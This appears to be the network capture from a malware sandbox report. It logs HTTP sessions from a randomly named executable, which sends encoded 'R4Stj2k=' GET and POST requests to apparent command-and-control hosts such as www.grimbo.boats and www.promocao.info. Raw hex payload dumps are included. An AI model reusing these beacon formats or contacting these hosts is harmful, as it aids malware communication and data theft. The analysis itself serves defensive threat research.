                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 6b 70 68 31 6d 30 47 33 44 77 35 78 31 67 7a 67 4e 6f 2f 6e 4b 39 59 57 5a 31 30 77 42 4a 31 79 73 66 2f 46 52 6a 31 52 64 74 6e 52 6b 4e 31 32 49 62 2b 71 54 41 34 64 68 7a 76 53 38 63 4b 42 71 46 4b 63 2b 62 4c 74 4c 63 77 47 55 4c 30 7a 64 59 33 73 43 43 64 35 5a 41 4a 39 72 49 75 51 59 54 69 70 55 4a 5a 57 6c 52 49 4a 51 76 50 6c 44 77 45 42 35 55 6d 2b 2b 75 32 41 32 56 64 2b 2b 42 55 5a 35 59 74 77 39 44 31 44 70 59 47 50 4d 64 5a 32 41 77 77 68 77 48 62 58 2b 37 36 34 34 69 46 6a 57 52 7a 6f 64 36 48 64 69 4d 55 6b 36 5a 39 71 67 43 59 54 71 6b 49 6d 39 61 51 71 43 4f 30 57 69 55 6d 33 63 76 59 48 6a 51 46 2f 70 73 30 38 69 4e 7a 4c 58 30 7a 44 58 55 68 56 6a 70 4a 37 74 77 34 32 45 52 35 57 36 63 65 62 2f 56 30 45 38 36 52 71 78 6d 32 4f 30 52 34 4d 49 4d 38 48 35 7a 6b 32 32 37 53 32 46 61 53 5a 70 75 56 56 56 58 2f 47 75 6e 71 5a 6c 31 51 43 [TRUNCATED]
                                                          Data Ascii: R4Stj2k=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1kph1m0G3Dw5x1gzgNo/nK9YWZ10wBJ1ysf/FRj1RdtnRkN12Ib+qTA4dhzvS8cKBqFKc+bLtLcwGUL0zdY3sCCd5ZAJ9rIuQYTipUJZWlRIJQvPlDwEB5Um++u2A2Vd++BUZ5Ytw9D1DpYGPMdZ2AwwhwHbX+7644iFjWRzod6HdiMUk6Z9qgCYTqkIm9aQqCO0WiUm3cvYHjQF/ps08iNzLX0zDXUhVjpJ7tw42ER5W6ceb/V0E86Rqxm2O0R4MIM8H5zk227S2FaSZpuVVVX/GunqZl1QCrNt+tSJvlYuV6sFx2XJrGI0dKpWdtmmNXl/YcAyOu1Ozh7WqUF4nL+sXBWxpNdcZbB7bV63sXEc72I3AtNKoQOb7/Nw3OZcJsHTp1J06h4fUd2CfznQn12FuSLv4/RRZL5cBBMsmZ2TzY8ezbrU6FhPRfIMKqY5iPMve61G6PROFiCRx/bWt96WT+Ax2BsfqkaVpU73ax+YEu5nfAl6Hy9uej3PwX9I27EOOrnQVAZdpqj5gIzq4emptzyRg9xIZE+8BHbLpmjdtFh494SxtW2r1ctD0cKqACx//z6DIkvHuOdctGU1ofG52T+WgnTJq/wJm5FUBhDTM6PHIfbNxqVjzOU8v/BuZ3FQSOuNKkGJd5GJwJYeEo2Y0CVAJFBVRaa+TT3LIbV8hiXpCyN02cmq+8Lv5gIl7qPHgUGThs4eQrUB3bzFMD3sUHoS2b8324PYrU7PlKjKunWTg2XY1LFXys243kGelp4ARLLjgHckx8FDcj/sg3+Vr/l7I0WXedq9L9tSP4Noxw9tPSvFd0wL3Ese6WsFj8t4qMZeQLJxyFyCqOjsd5zNREsibYoFB/VDqTSnBMR1lB69ZmWh6SHAKRTxMkxPmEs2EYTASe+/iVpDcrRW8uIKQVzVa6TaFRfMNZKkT2DXDXAcng4TQFvuOGTKel/jTBM [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.54997884.32.84.32803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:24:58.160974026 CET485OUTGET /zaz4/?R4Stj2k=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddjkJxjmB725u/4P9m9WNTMgvCSsWrKIDHmR4Q2StU9f7tIQ==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.promocao.info
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:24:58.544517040 CET1236INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 08:24:58 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 9973
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Server: hcdn
                                                          alt-svc: h3=":443"; ma=86400
                                                          x-hcdn-request-id: 86e670a85cd6f5821b5239f2f7b9351e-bos-edge1
                                                          Expires: Thu, 16 Jan 2025 08:24:57 GMT
                                                          Cache-Control: no-cache
                                                          Accept-Ranges: bytes
                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                          Jan 16, 2025 09:24:58.544562101 CET224INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                          Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30
                                                          Jan 16, 2025 09:24:58.544598103 CET1236INData Raw: 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74 2d
                                                          Data Ascii: px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:0
                                                          Jan 16, 2025 09:24:58.544634104 CET1236INData Raw: 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f 72
                                                          Data Ascii: lign:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px;
                                                          Jan 16, 2025 09:24:58.544667006 CET1236INData Raw: 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30
                                                          Data Ascii: align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{disp
                                                          Jan 16, 2025 09:24:58.544704914 CET672INData Raw: 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 20 72 65 6c 3d 6e 6f 66 6f
                                                          Data Ascii: cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidden=true class
                                                          Jan 16, 2025 09:24:58.544739962 CET1236INData Raw: 20 75 73 69 6e 67 20 48 6f 73 74 69 6e 67 65 72 20 6e 61 6d 65 73 65 72 76 65 72 73 2e 20 54 61 6b 65 20 74 68 65 20 72 65 63 6f 6d 6d 65 6e 64 65 64 20 73 74 65 70 73 20 62 65 6c 6f 77 20 74 6f 20 63 6f 6e 74 69 6e 75 65 20 79 6f 75 72 20 6a 6f
                                                          Data Ascii: using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=domain-default-img.svg></div><div class=col-xs-12><div class=section-title>What's next?</div></div><div class="clearfix c
                                                          Jan 16, 2025 09:24:58.544775009 CET1236INData Raw: 65 6d 65 6e 74 20 70 61 67 65 20 6f 66 20 79 6f 75 72 20 48 6f 73 74 69 6e 67 65 72 20 61 63 63 6f 75 6e 74 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d
                                                          Data Ascii: ement page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger rel=nofollow>Change nameservers</a></div></div></div></div></div><script>var punycode=new function(){
                                                          Jan 16, 2025 09:24:58.544806957 CET1236INData Raw: 6e 67 65 45 72 72 6f 72 28 22 49 6c 6c 65 67 61 6c 20 69 6e 70 75 74 20 3e 3d 20 30 78 38 30 22 29 3b 6d 2e 70 75 73 68 28 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 29 7d 66 6f 72 28 64 3d 30 3c 63 3f 63 2b 31 3a 30 3b 64 3c 45 3b 29 7b 66 6f
                                                          Data Ascii: ngeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeError("punycode_bad_input(1)");if(v=e.charCodeAt(d++),o<=(s=v-48<10?v-22:v-65<26?v-65:v-97<26?v-97:o))throw RangeError("p
                                                          Jan 16, 2025 09:24:58.544842958 CET764INData Raw: 68 3d 6c 2c 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 7b 69 66 28 28 43 3d 74 5b 64 5d 29 3c 68 26 26 2b 2b 66 3e 72 29 72 65 74 75 72 6e 20 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68
                                                          Data Ascii: h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.549980172.67.182.198803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:03.590720892 CET740OUTPOST /kxtt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.grimbo.boats
                                                          Origin: http://www.grimbo.boats
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.grimbo.boats/kxtt/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 54 41 64 49 41 50 49 65 4a 46 78 68 37 77 52 31 79 41 63 50 75 4a 6e 52 62 4b 78 77 39 7a 76 47 34 4a 48 33 37 70 54 46 45 38 44 57 76 50 2f 48 34 6f 72 75 47 59 46 51 52 56 6c 6a 4f 62 71 74 74 70 47 6d 31 79 6a 33 58 42 70 4b 52 2f 30 4f 65 51 30 38 74 78 42 31 4d 73 49 30 6d 6a 35 42 47 77 63 59 73 61 7a 66 32 7a 61 75 48 6c 49 6c 39 39 58 53 36 66 73 72 53 6b 51 73 30 75 45 63 67 58 36 30 5a 4b 47 56 75 4d 73 77 64 7a 6d 58 36 57 6e 53 4f 77 35 4a 65 6f 32 37 7a 58 6d 72 34 63 52 35 4e 78 31 4c 7a 7a 4c 4d 76 39 72 30 69 6a 77 4d 54 67 58 72 6c 55 33 4f 46 74 72 6c 6a 37 61 78 72 39 67 3d
                                                          Data Ascii: R4Stj2k=TAdIAPIeJFxh7wR1yAcPuJnRbKxw9zvG4JH37pTFE8DWvP/H4oruGYFQRVljObqttpGm1yj3XBpKR/0OeQ08txB1MsI0mj5BGwcYsazf2zauHlIl99XS6fsrSkQs0uEcgX60ZKGVuMswdzmX6WnSOw5Jeo27zXmr4cR5Nx1LzzLMv9r0ijwMTgXrlU3OFtrlj7axr9g=
                                                          Jan 16, 2025 09:25:04.279062986 CET1088INHTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:04 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vWG%2FSM8qJ0DRVt5wzWoyamKXhz3Ag3gSbxVeTagXjq3%2B5PrmISaX54wrBoJ3ZPH5nrh19ZNPqmVnkolCU1LTFSuluDzVn5xn7eDyT9Ram51Ej17c0uZPyyy0j0SEkO4zXlk"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb6780d46ab45-YYZ
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13728&min_rtt=13728&rtt_var=6864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.549981172.67.182.198803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:06.145678997 CET760OUTPOST /kxtt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.grimbo.boats
                                                          Origin: http://www.grimbo.boats
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.grimbo.boats/kxtt/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 33 57 73 76 50 48 71 63 66 75 44 59 46 51 4a 46 6c 6d 52 4c 71 69 74 70 4b 75 31 32 72 33 58 42 39 4b 52 36 49 4f 64 6a 4d 2f 73 68 42 33 4e 63 49 32 6c 54 35 42 47 77 63 59 73 61 6d 34 32 7a 69 75 48 57 51 6c 38 59 6a 56 7a 2f 73 6b 56 6b 51 73 2b 4f 45 51 67 58 37 54 5a 4c 71 2f 75 4a 77 77 64 7a 57 58 36 6e 6e 64 41 77 34 43 51 49 33 6b 6c 58 58 33 78 61 64 54 50 51 45 71 6f 41 72 74 75 4c 61 65 34 42 34 6b 41 41 37 54 31 48 2f 35 55 64 4b 4d 35 59 4b 42 31 71 33 61 73 4e 68 41 6a 73 79 2f 58 56 79 58 61 73 4a 59 56 47 6d 5a
                                                          Data Ascii: R4Stj2k=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEO3WsvPHqcfuDYFQJFlmRLqitpKu12r3XB9KR6IOdjM/shB3NcI2lT5BGwcYsam42ziuHWQl8YjVz/skVkQs+OEQgX7TZLq/uJwwdzWX6nndAw4CQI3klXX3xadTPQEqoArtuLae4B4kAA7T1H/5UdKM5YKB1q3asNhAjsy/XVyXasJYVGmZ
                                                          Jan 16, 2025 09:25:06.811521053 CET1091INHTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:06 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dG9Q%2Br8K4ZDKEBQ1kr%2FZqJy8tvBunTC4GIqYr%2BQgA0N34%2FARRgRfiV8pdBAoTUSJme3z%2Be%2FXzOOqFtSAoRXUp8DfFwhwq95Z%2BJYTxEaLPJA2ovqgVfXdt8aL6O1lC2U9Piox"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb687e8445890-IAD
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7243&min_rtt=7243&rtt_var=3621&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=760&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.549982172.67.182.198803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:08.699939966 CET1777OUTPOST /kxtt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.grimbo.boats
                                                          Origin: http://www.grimbo.boats
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.grimbo.boats/kxtt/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 50 57 76 65 76 48 34 4c 44 75 45 59 46 51 58 56 6c 6e 52 4c 71 46 74 71 36 71 31 32 76 6e 58 43 46 4b 65 2f 45 4f 57 79 4d 2f 6c 68 42 33 47 38 49 31 6d 6a 34 4a 47 77 4d 63 73 61 32 34 32 7a 69 75 48 51 38 6c 37 4e 58 56 31 2f 73 72 53 6b 51 67 30 75 45 38 67 58 79 73 5a 4c 66 4b 75 64 38 77 64 54 47 58 70 46 2f 64 4d 77 34 41 54 49 33 73 6c 58 62 65 78 63 35 31 50 51 41 4d 6f 41 54 74 69 4e 4b 48 76 44 67 34 57 77 72 49 36 41 7a 62 4b 6f 44 70 2b 4c 71 68 2b 39 66 6b 6e 39 68 4a 6a 34 61 77 63 47 62 74 4a 5a 46 35 64 51 50 56 45 6c 48 4c 77 71 42 70 33 42 72 4d 39 54 57 73 53 6f 68 4b 66 59 35 59 4c 72 35 2f 59 71 64 48 41 48 63 6f 75 52 61 53 75 79 31 6e 39 37 50 68 74 63 61 56 71 6b 6d 66 35 4e 63 32 6f 6f 6d 56 6a 2b 39 41 33 31 76 58 37 53 51 41 32 53 4e 48 37 4a 61 31 70 63 5a 5a 6c 68 30 71 62 61 42 62 37 71 77 52 61 38 53 4f 78 31 50 75 34 32 [TRUNCATED]
                                                          Data Ascii: R4Stj2k=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEOPWvevH4LDuEYFQXVlnRLqFtq6q12vnXCFKe/EOWyM/lhB3G8I1mj4JGwMcsa242ziuHQ8l7NXV1/srSkQg0uE8gXysZLfKud8wdTGXpF/dMw4ATI3slXbexc51PQAMoATtiNKHvDg4WwrI6AzbKoDp+Lqh+9fkn9hJj4awcGbtJZF5dQPVElHLwqBp3BrM9TWsSohKfY5YLr5/YqdHAHcouRaSuy1n97PhtcaVqkmf5Nc2oomVj+9A31vX7SQA2SNH7Ja1pcZZlh0qbaBb7qwRa8SOx1Pu42ckQmKJCk6h3ycOIzLePq1kYUmhhKbuy4x9/9Zv6XPIdh3ZNiF531MKhg1mY6Q1k7w8mix63CJj0ZTCZmlOH7dIU4IuXXWtQd3H+Sw27cmns+EYb+/uVTldM+TnzFKtB2CW4rUy37ZiThnNr5MftE/Pwy0xmIHMJ3zuMh/nqBfynW00tNt8bWuxxsYv8G9y0+pO9SZoAuZFwUhHv8oMCkVG64JpvJwuDOTjfy3JQuI9VUPaSdBWI4gul3XBTrWAVku+Gkkt7qsJ+nrwStqtqwjlS41hCFcxOhw60aamq4FfEM4gTuFsL4FTdgJ9xnn6ND/2YI7A/zS+2IdoNs/ed7EcjM8B6+OO+JXWlQk90TkbHQq3mtooTIzFWpQrUuwwBnP0kDY0Qgqxn1Gr+hMmOBBOEcZ5WZ+BTX12UhOijs37ZvqTws7t/JcC50SHs3f+c+Jt0KHp2tX1PNaCLAaG8eqJIGjRDNn803lQmofM6lmF9HksXPVKZPTt0ei/ApUX4QxrCLzord/gZbzGqDc9qTfqIXQ9xAmnLJJ6Mel/l1cUceMbiXstZErqLDbUmYXOwH3uh9aPm1zJ8Kp16HgMQkkBxtHm1fn4LSg2y/GXPyGq4cfPImnMHK0Q+QdLDc8+drM8WQHrDzfoNKvRm5DpovgocQNa8hx5+Von [TRUNCATED]
                                                          Jan 16, 2025 09:25:09.398093939 CET1090INHTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:09 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P77ltRN%2BFyuc2GmUt6LAw4BVJS6TT2sWZwrK7mNOXF143G%2BlRLHUdpHYjV3MPKqMEfu34N9MoAWoTUn8DLCE1GebXO0qzUWzhw9ddzsBnVwi9J%2FTO8t%2BS1Xx7%2BrULGVYboSp"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
